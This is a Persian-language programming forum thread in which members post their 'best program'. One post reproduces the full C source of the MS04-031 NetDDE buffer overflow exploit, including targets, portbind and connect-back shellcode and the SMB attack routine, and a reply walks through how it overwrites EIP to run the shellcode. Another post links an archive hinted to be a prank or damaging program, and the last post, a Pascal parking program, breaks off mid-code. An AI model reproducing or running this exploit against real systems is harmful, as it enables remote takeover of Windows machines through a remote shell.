از اونجايي كه اساتيدي در اين فروم فعاليت دارند گفتم فرصت رو مغتنم بشمارم و يه تاپيك با عنوان بهترين برنامه اي كه تا به حال نوشتيد (به هر زباني) راه بندازيم!
تا بقيه از اين برنامه ها بهره ببرن .
فقط جون .!..!. كپي نكنين:19:
Printable View
از اونجايي كه اساتيدي در اين فروم فعاليت دارند گفتم فرصت رو مغتنم بشمارم و يه تاپيك با عنوان بهترين برنامه اي كه تا به حال نوشتيد (به هر زباني) راه بندازيم!
تا بقيه از اين برنامه ها بهره ببرن .
فقط جون .!..!. كپي نكنين:19:
فقط مشاهده ...!
نااميد شدم رفت.:41:
پس اين فروم هم مثل بقيه فروم ها پر از افرادي هست كه فقط چهارتا اصطلاح حفظ كردن و ...
این بهترینش بوده :
:5:کد:#incldue <stdio.h>
int main()
{
printf("Hello World!\n");
return 0;
}
مال من اين بوده.......
کد:
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif
/* targets table */
struct targets {
int num;
char name[50];
long jmpaddr;
}
target[]= {
{ 0, "WinXP [universal] ", 0x00abfb1c - 0x20 },
{ 1, "Win2K [universal] ", 0x009efb60 - 0x20 }
};
/* portbind shellcode */
unsigned char portbindsc[] =
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70"
"\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6"
"\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e"
"\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83"
"\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32"
"\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59"
"\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50"
"\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50"
"\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14"
"\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc"
"\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c"
"\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33"
"\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44"
"\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d"
"\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50"
"\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55"
"\x28\xff\x55\x0c";
/* connectback shellcode */
unsigned char connectbacksc[] =
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa"
"\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02"
"\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83"
"\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83"
"\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc"
"\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8"
"\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90"
"\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50"
"\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8"
"\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56"
"\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa"
"\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab"
"\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50"
"\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff"
"\x77\x38\xff\x55\x20\xff\x55\x0c";
#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300)) = (port)
#define SET_CONNECTBACK_IP(buf, ip) *(unsigned long *)(((buf)+283)) = (ip)
#define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+290)) = (port)
/*
eax = target[].jmpaddr -> stack -> jmpcode -> shellcode
1. 0100D605 call dword ptr [eax+20h]
2. jmpcode
3. shellcode
*/
char jmpcode[] =
"\x90\x90\x90\x90\x66\x81\xC7\x20\x03\xFF\xE7\x90\x90\x90\x90\x90"
"\x50\x6f\x43\x20\x66\x6f\x72\x20\x4e\x65\x74\x44\x44\x45\x20\x28"
"\x4d\x53\x30\x34\x2d\x30\x33\x31\x29\x2e\x20\x43\x6f\x70\x79\x72"
"\x69\x67\x68\x74\x20\x28\x63\x29\x20\x32\x30\x30\x34\x2d\x32\x30"
"\x30\x35\x20\x68\x6f\x75\x73\x65\x6f\x66\x64\x61\x62\x75\x73\x2e"
"\xBB\xBB\xBB\xBB" /* => eax */
"PADPAD";
char smb_sesreq[] =
"\x81\x00\x00\x44\x20\x43\x4b\x46\x44\x45\x4e\x45\x43\x46\x44\x45"
"\x46\x46\x43\x46\x47\x45\x46\x46\x43\x43\x41\x43\x41\x43\x41\x43"
"\x41\x43\x41\x43\x41\x00\x20\x45\x4b\x45\x44\x46\x45\x45\x49\x45"
"\x44\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43"
"\x41\x43\x41\x43\x41\x41\x41\x00";
char smb_negotiate[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5c\x02"
"\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e"
"\x31\x32\x00";
char d1[] =
"\x0d\x12\x0b\x06\x0d\x18\x1c\x01\x10\x03\x12\x08\x1d\x1f\x0a\x0a"
"\x16\x02\x17\x0e\x1b\x0d";
char req1[] =
"\x81\x00\x00\x44";
char req2[] =
"CACACACACACACACACACACACACACACABP";
char h1[] =
"\x45\x44\x44\x4E\x00\x00\x00";
char h2[] =
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
char h3[] =
"\x00\x00\x02\x02\x00\x00\x00\x01\x00\x00\x00";
unsigned long ndlen = 0;
unsigned long ntarget = 0;
unsigned long backip = 0;
unsigned short bindport = 0;
unsigned long
fixx(unsigned char *data, unsigned long i)
{
unsigned long len;
len = (data[i+3]<<24) +
(data[i+2]<<16) +
(data[i+1]<<8) +
(data[i]);
return len;
}
unsigned long
chksum(unsigned char *data, unsigned long dlen)
{
unsigned long i, len;
unsigned long chk;
chk = 0xFFFFFFFF;
len = dlen - 4;
for (i=0; i<len; i+=4)
chk += fixx(data, i);
while (i < dlen) {
chk += (unsigned char)data[i];
i++;
}
return chk;
}
char *
netbios_encode(char *ndata, char service)
{
char *tmpdata, *data, *nret;
unsigned long dlen;
char odiv, omod, o;
int i;
data = (char *)calloc(17, 1);
memcpy(data, ndata, strlen(ndata));
dlen = strlen(data);
while (dlen < 15) {
strcat(data, "\x20");
dlen++;
}
memcpy(data+strlen(data), &service, 1);
nret = (char *)calloc(strlen(data)*2+1, 1);
tmpdata = nret;
for (i=0; i<16; i++) {
o = (char)data[i];
odiv = o / 16;
odiv = odiv + 0x41;
omod = o % 16;
omod = omod + 0x41;
*tmpdata++ = odiv;
*tmpdata++ = omod;
}
free(data);
return nret;
}
unsigned char *
find_smbname(unsigned char *data, unsigned long len)
{
unsigned char *ptr;
unsigned long i = 0;
ptr = data;
ptr += 91;
while (i <= len - 3) {
if (ptr[i] == '\x00')
if (ptr[i+1] == '\x00')
if (ptr[i+2] == '\x00')
return ptr+i+3;
i++;
}
return NULL;
}
/* fingerprinting */
unsigned char *
smb_get_name(char *ip)
{
int sock, r;
unsigned long smbname_len;
unsigned char *name = NULL, *smbname;
struct sockaddr_in s;
struct hostent *he;
unsigned char buf[256];
if ((he = gethostbyname(ip)) == NULL) {
printf("[-] Unable to resolve %s\n", ip);
return NULL;
}
sock = socket(AF_INET, SOCK_STREAM,
IPPROTO_TCP);
if (sock < 0) return NULL;
s.sin_family = AF_INET;
s.sin_addr = *((struct in_addr *)he->h_addr);
s.sin_port = htons(139);
memset(&(s.sin_zero), '\0', 8);
memset(buf, 0, 256);
printf("[*] Connecting to %s:139 ... ", ip);
r = connect(sock, (struct sockaddr *) &s, sizeof(struct
sockaddr_in));
if (r == 0) {
printf("OK\n[*] Fingerprinting... ");
/* sending session request */
send(sock, smb_sesreq, sizeof(smb_sesreq)-1,
0);
Sleep(1000);
r = recv(sock, (char *)buf, 256, 0);
if (r < 0) goto err;
memset(buf, 0, 256);
/* sending negotiation request */
send(sock, smb_negotiate,
sizeof(smb_negotiate)-1, 0);
Sleep(1000);
r = recv(sock, (char *)buf, 256, 0);
if (r < 0) goto err;
printf("OK\n");
smbname = find_smbname(buf, r);
if (smbname == NULL) goto err;
smbname_len = smbname - buf;
name = (unsigned char *)calloc(smbname_len,
1);
/* decoding */
r = 0;
while (smbname_len) {
if (*smbname != '\x00') {
name[r] = *smbname;
r++;
}
smbname++;
smbname_len--;
}
} else {
printf("failed\n[-] Can't connect to %s:139\n", ip);
}
err:
shutdown(sock, 1);
closesocket(sock);
return name;
}
/* NetDDE packet */
char *
packet_assembly(char *name, char *host)
{
char *main, *header, *data;
char *lname, *rhost;
unsigned long llen, rlen, len, hlen, dlen, csum, i;
unsigned char name_hi, name_low, rhost_hi,
rhost_low;
unsigned char hod_hi, hod_low, len_hi, len_low;
unsigned char nops[] = "\x90\x90\x90\x90"; /* nops */
char hod[] = "HOD-HOD\x01";
char hmain[] = "\x01\x00\xBE\x05\x0A\x00\x00";
char tmp[8];
llen = strlen(name) + 4;
rlen = strlen(host);
lname = (char *)calloc(llen + 3, 1);
rhost = (char *)calloc(rlen + 3, 1);
memcpy(lname, name, llen);
strcpy(rhost, host);
memcpy(lname + llen, "\x01", 1);
strcat(rhost, "\x01");
name_hi = (unsigned char) ((llen+1) / 256);
name_low = (unsigned char) ((llen+1) % 256);
rhost_hi = (unsigned char) ((rlen + llen + 2) / 256);
rhost_low = (unsigned char) ((rlen + llen + 2) % 256);
len = sizeof(hod) - 1;
hod_hi = (unsigned char) (len / 256);
hod_low = (unsigned char) (len % 256);
main = (char *)calloc( sizeof(hod)-1 +
sizeof(hmain)-1 +
llen + rlen +
11, 1 );
memcpy(main, hmain, sizeof(hmain)-1);
sprintf(tmp, "%c%c%c%c%c%c", name_hi, name_low,
rhost_hi, rhost_low, hod_hi, hod_low);
memcpy(main+sizeof(hmain)-1, tmp, 6);
memcpy(main+sizeof(hmain)-1+6, "\x00", 1);
memcpy(main+sizeof(hmain)-1+7, lname, llen+1);
memcpy(main+sizeof(hmain)-1+7+llen+1, rhost,
rlen+1);
memcpy(main+sizeof(hmain)-1+7+llen+1+rlen+1, hod,
sizeof(hod)-1);
memcpy(main+sizeof(hmain)-1+7+llen+1+rlen+1+sizeof(hod)-1,
"\x2e", 1);
len =
sizeof(hmain)-1+7+llen+1+rlen+1+sizeof(hod)-1+1;
len_hi = (unsigned char) (len / 256);
len_low = (unsigned char) (len % 256);
/* header */
header = (char *)calloc(sizeof(h1)-1 +
sizeof(h2)-1 +
sizeof(h3)-1 +
9, 1);
memcpy(header, h1, sizeof(h1)-1);
sprintf(tmp, "%c%c", len_hi, len_low);
memcpy(header+sizeof(h1)-1, tmp, 2);
memcpy(header+sizeof(h1)-1+2, h2, sizeof(h2)-1);
memcpy(header+sizeof(h1)-1+2+sizeof(h2)-1, tmp, 2);
memcpy(header+sizeof(h1)-1+2+sizeof(h2)-1+2, h3,
sizeof(h3)-1);
csum = chksum(main, len);
memcpy(header+sizeof(h1)-1+sizeof(h2)-1+4
+ sizeof(h3)-1, &csum, 4);
/* data */
hlen = sizeof(h1)-1 + sizeof(h2)-1 + sizeof(h3)-1 + 8;
data = (char *)calloc( sizeof(d1)-1 +
len+hlen +
37 +
1200, 1 );
csum = chksum(header, hlen);
memcpy(data+4, &csum, 4);
memcpy(data+4+4, header, hlen);
memcpy(data+4+4+hlen, main, len);
memcpy(data+4+4+hlen+len, d1, sizeof(d1)-1);
/* nops */
for (i=0; i<154; i++)
memcpy(data+4+4+hlen+len+sizeof(d1)-1 + i*4,
nops, 4);
/* shellcode */
if (!backip) {
/* portbind */
SET_PORTBIND_PORT(portbindsc,
htons(bindport));
memcpy(data+4+4+hlen+len+sizeof(d1)-1+154*4,
portbindsc, sizeof(portbindsc)-1);
dlen =
4+hlen+len+sizeof(d1)-1+sizeof(portbindsc)-1+154*4;
} else {
/* connectback */
SET_CONNECTBACK_IP(connectbacksc,
backip);
SET_CONNECTBACK_PORT(connectbacksc,
htons(bindport));
memcpy(data+4+4+hlen+len+sizeof(d1)-1+154*4,
connectbacksc, sizeof(connectbacksc)-1);
dlen =
4+hlen+len+sizeof(d1)-1+sizeof(connectbacksc)-1+154*4;
}
ndlen = dlen + 4;
dlen = htonl(dlen);
memcpy(data, &dlen, 4);
free(lname);
free(rhost);
free(main);
free(header);
return data;
}
void
usage(char *prog)
{
int i;
printf("%s <host> <netbios name> <target> <bindport> [connectback IP] [options]\n\n", prog);
printf("Targets:\n");
for (i = 0; i < 2; i++)
printf(" %d [0x%.8x]: %s\n", target[i].num,
target[i].jmpaddr, target[i].name);
printf("\nOptions:\n\t-f: Netbios name fingerprinting\n");
exit(0);
}
void
vargs(int argc, char **argv)
{
int i, finger = 0;
char *nname = NULL;
for (i = 2; i < argc; i++) {
if (argv[i][0] == '-') {
if (argv[i][1] == 'f')
finger = 1;
}
}
if (finger && argc > 2) {
nname = smb_get_name(argv[1]);
if (nname) {
printf("[+] Remote netbios name: %s\n",
nname);
free(nname);
}
exit(0);
} else
if (argc < 5) usage(argv[0]);
if ((ntarget = atoi(argv[3])) > 1) usage(argv[0]);
bindport = (unsigned short)atoi(argv[4]);
if (argc > 5) backip = inet_addr(argv[5]);
return;
}
int
main (int argc, char **argv)
{
int len, sockfd;
char *host;
char *req;
struct hostent *he;
struct sockaddr_in their_addr;
char rbuf[4096];
#ifdef _WIN32
WSADATA wsa;
#endif
char *ses_req;
char *data, *hname;
char *hn, *hn2;
unsigned long req_sz, hname_len, hn_len;
#ifdef _WIN32
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
printf("\n (MS04-031) NetDDE buffer overflow vulnerability PoC\n\n");
printf("\tCopyright (c) 2004-2005 .::[ houseofdabus ]::.\n\n\n");
vargs(argc, argv);
hn = argv[2]; /* target netbios name */
host = argv[1]; /* target host name */
if (strlen(host) > 1024) return 0;
/* target jmpaddr */
memcpy(jmpcode+80, &target[ntarget].jmpaddr, 4);
ses_req = (char *)calloc(sizeof(req1)-1 +
sizeof(req2)-1 +
114, 1);
memcpy(ses_req, req1, sizeof(req1)-1);
memcpy(ses_req+sizeof(req1)-1, "\x20", 1);
hname = netbios_encode(hn, 0x1F);
hname_len = strlen(hname);
memcpy(ses_req+sizeof(req1)-1+1, hname,
hname_len);
memcpy(ses_req+sizeof(req1)-1+1+hname_len,
"\x00\x20", 2);
memcpy(ses_req+sizeof(req1)-1+1+hname_len+2,
req2, sizeof(req2)-1);
memcpy(ses_req+sizeof(req1)-1+1+hname_len+2+sizeof(req2)-1,
"\x00", 1);
req_sz =
sizeof(req1)-1+sizeof(req2)-1+hname_len+4;
if ((he = gethostbyname(host)) == NULL) {
printf("[-] Unable to resolve %s\n", host);
return 0;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) <
0) {
printf("[-] Error: socket failed\n");
return 0;
}
req = req1;
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(139);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);
/* connecting */
printf("[*] Connecting to %s:139 ... ", host);
if (connect(sockfd, (struct sockaddr *)&their_addr,
sizeof(struct sockaddr)) < 0) {
printf("[-] Error: connect failed\n");
return 0;
}
printf("OK\n");
if (send(sockfd, ses_req, req_sz, 0) < 0) {
printf("[-] Error: send failed\n");
return 0;
}
len = recv(sockfd, rbuf, 4096, 0);
if (len < 0) return 0;
/* check NetDDE */
if ((unsigned char)rbuf[0] != 0x82) {
printf("[-] NetDDE disabled or wrong netbios name\n");
return 0;
}
hn2 = (char *)calloc(16, 1);
memcpy(hn2, hn, strlen(hn));
hn_len = strlen(hn);
while (hn_len < 15) {
strcat(hn2, "\x20");
hn_len++;
}
/* attacking */
printf("[*] Attacking %s ...", host);
data = packet_assembly(jmpcode, hn2);
if (send(sockfd, data, ndlen, 0) < 0) {
printf("\n[-] Error: send failed\n");
return 0;
}
printf("OK.\n");
len = recv(sockfd, rbuf, 4096, 0);
shutdown(sockfd, 1);
closesocket(sockfd);
free(data);
free(hn2);
free(ses_req);
free(hname);
return 0;
}
با تشكر .
اين يه برنامه ساده ولي جالب به زبان ++c هستش.
فقط توصيه ميكنم وقتي اجراش كنيد كه كارتون با كامپيوتر تمومه و ميخوايد خاموشش كنيد:46:!
کد:http://rapidshare.com/files/229395796/booogh.rar.html
dsa جان ميشه مقداري در مورد اين كدتون توضيح بديد:13:نقل قول:
يا اناليزش كنيد؟
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif
اين قسمت همانطور كه مي بينيد مربوط به شرط در C++ مي باشد اين برنامه جوري نوشته شده است ميشه هم در Windows و سيستم هاي لينوكسي Compile كرد به اين صورت كه ابتدا شرط بررسي مي كند اگر در ويندوز بود Header هاي مخصوص ويندوز را Call كند و اگر لينوكس بود به همين صورت ...
{ 0, "WinXP [universal] ", 0x00abfb1c - 0x20 },
{ 1, "Win2K [universal] ", 0x009efb60 - 0x20 }
};
اين قسمت مربوطه به Ret Address ها يا EIP هاي ويندوز هاي XP و 2000 است كه قابليت رو به ما مي ده كه همزمان دو نوع Windows را Exploit كنيم .. EIP يكي Register هاي اسمبلي است كه به دستور بعدي كه قرار اجرابشه اشاره مي كنه و با بازنويسي آن و point كرد به آدرس shellcode مي توان shellcode را روي stack اجرا نمود.
/* portbind shellcode */
unsigned char portbindsc[] =
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\ x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\ x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\ x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\ x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\ xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\ x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\ x89\x44\x24\x1c"
"\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\ x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\ xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\ xad\xa4\x1a\x70"
"\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\ x3b\xe7\x79\xc6"
"\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\ xff\xff\xff\x5e"
"\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\ x04\x8b\xce\x83"
"\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\ x66\xb8\x33\x32"
"\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\ x55\x04\x5a\x59"
"\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\ xc1\xf8\x08\x50"
"\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\ x83\xc0\x72\x50"
"\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\ x50\xff\x55\x14"
"\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\ x11\x5c\xfe\xcc"
"\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\ x56\xff\x55\x1c"
"\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\ x20\x8b\xf0\x33"
"\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\ x5f\xc6\x07\x44"
"\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\ x5f\x33\xc0\x8d"
"\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\ xff\x75\x34\x50"
"\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\ x77\x38\xff\x55"
"\x28\xff\x55\x0c";
شل كدي است كه با هدف Port Binding نوشته شده است يعني يك پورت را باز مي كند و listen مي كنه روي اون پورت بعد هم ميشه به اون پورت Telnet كرد...
char jmpcode[] =
"\x90\x90\x90\x90\x66\x81\xC7\x20\x03\xFF\xE7\x90\ x90\x90\x90\x90"
"\x50\x6f\x43\x20\x66\x6f\x72\x20\x4e\x65\x74\x44\ x44\x45\x20\x28"
"\x4d\x53\x30\x34\x2d\x30\x33\x31\x29\x2e\x20\x43\ x6f\x70\x79\x72"
"\x69\x67\x68\x74\x20\x28\x63\x29\x20\x32\x30\x30\ x34\x2d\x32\x30"
"\x30\x35\x20\x68\x6f\x75\x73\x65\x6f\x66\x64\x61\ x62\x75\x73\x2e"
"\xBB\xBB\xBB\xBB" /* => eax */
"PADPAD";
char smb_sesreq[] =
"\x81\x00\x00\x44\x20\x43\x4b\x46\x44\x45\x4e\x45\ x43\x46\x44\x45"
"\x46\x46\x43\x46\x47\x45\x46\x46\x43\x43\x41\x43\ x41\x43\x41\x43"
"\x41\x43\x41\x43\x41\x00\x20\x45\x4b\x45\x44\x46\ x45\x45\x49\x45"
"\x44\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\ x41\x43\x41\x43"
"\x41\x43\x41\x43\x41\x41\x41\x00";
char smb_negotiate[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x5c\x02"
"\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54\x20\x4c\ x4d\x20\x30\x2e"
"\x31\x32\x00";
مربوط به مرحله Connect كردن به سيستم قرباني از طريق پروتكل هاي به اشتراك گذاري ميباشد...
قسمت هاي مهم توضيح دادم در پست هاي بعد بيشتر روي اين موضوع كار مي كنم ..
موفق باشيد.
با سلام
اینم یه شاهکار تو برنامه نویسی روز دنیا:
Private Sub Form_Load
End Sub
با تشکر
:10:
این آخرین برنامه ام بوده ولی بهترین برنامه ام اولین برنامه ام بود. تاریخ تولد میگرفت سن رو نشون میداد خیلی حال کردم وقتی جواب داد
این برنامه یه پارکینگه یک طرفه است با یک ورودی و دو قسمت پارکینگ به شکل صلیب. با استفاده از لیست پیوندی و به زبان پاسکالکد:program test;
uses
crt;
type
p_node = ^node;
node=record
name:string[20];
link:p_node;
end;
pnode = ^node1;
node1=record
name:string[20];
link:pnode;
end;
var
bln : boolean;
k:string[10];
x,y,temp1,temp : p_node;
i,j,n,p,m,num,rear: integer;
a,b,t,te : pnode;
q:array[1..20] of string[10];
procedure add;
begin
if i=1 then
begin
new(x);
write('enter a name:');
readln(x^.name);
x^.link:=nil;
temp:=x;
i:=i+1;
writeln(' ',x^.name,' saved in list1');
end
else
if (i<=5) and (i<>1) then
begin
new(y);
write('enetr a name:');
readln(y^.name); y^.link:=nil;
temp^.link:= y;
temp:=temp^.link;
i:=i+1;
writeln(' ',y^.name,' saved in list 1');
end
else
if j=1 then
begin
new(a);
write('enter a name:');
readln(a^.name);
a^.link:=nil;
t:=a;
j:=j+1;
writeln(' ',a^.name,' saved in list2');
end
else
if (j<=5) and (j<>1) then
begin
new(b);
write('enetr a name:');
readln(b^.name);
b^.link:=nil;
t^.link:= b;
t:=t^.link;
j:=j+1;
writeln(' ',b^.name,' saved in list2');
end
else
if rear<5 then
begin
rear:= rear+1;
write(' enter a name:');
readln(k);
q[rear]:=k;
writeln(' the lists is full. ',k,' saved in queu');
end;
end;
procedure show;
begin
writeln('showing...');
temp:=x;
t:=a;
writeln(' list1:');
while temp<> nil do
begin
writeln(' ',temp^.name);
temp:=temp^.link;
end;
writeln(' list2:');
while t<> nil do
begin
writeln(' ',t^.name);
t:=t^.link;
end;
temp:=y;
t:=b;
writeln(' queu:');
for m := 1 to rear do
writeln(' ',q[m]);
end;
procedure del;
begin
write(' enter a car for delete:');
readln(k);
write(' enter a queu:');
readln(n);
if n = 1 then
begin
temp:=x;
while (temp <>nil ) do
begin
if temp^.name = k then
begin
temp1:=temp;
bln:=true;
end;
temp:=temp^.link;
end;
if bln = true then
begin
temp:=x;
while (temp^.link <> temp1) do
temp:= temp^.link;
temp^.link := temp1^.link;
dispose(temp1);
i:=i-1;
if rear<>0 then
begin
new(y);
y^.name := q[1];
y^.link:=nil;
temp:=x;
while (temp^.link <> nil) do
temp:=temp^.link;
temp^.link :=y;
i:=i+1;
for p:=1 to rear do
q[p]:=q[p+1];
rear:=rear-1;
end;
end;
end
else
if n = 2 then
begin
t:=a;
while (t <>nil ) do
begin
if t^.name = k then
begin
te:=t;
bln:=true;
end;
t:=t^.link;
end;
if bln= true then
begin
t:=a;
while (t^.link <> te) do
t:= t^.link;
t^.link := te^.link;
dispose(te);
j:=j-1;
if rear<>0 then
begin
new(b);
b^.name := q[1];
b^.link:=nil;
t:=a;
while (t^.link <> nil) do
t:=t^.link;
t^.link :=b;
j:=j+1;
for p:=1 to rear do
q[p]:=q[p+1];
rear:=rear-1;
end;
end;
end
else
write(' enter a queu true');
if bln= false then
write(' no match found!!')
else
bln:=false;
end;
begin
clrscr;
i:=1;
j:=1;
rear:=0;
bln:=false;
writeln(' 1:add to parking:');
writeln(' 2:show the car:');
writeln(' 3:delete the car:');
writeln(' 4:exit');
readln(num);
while num<>4 do
begin
case num of
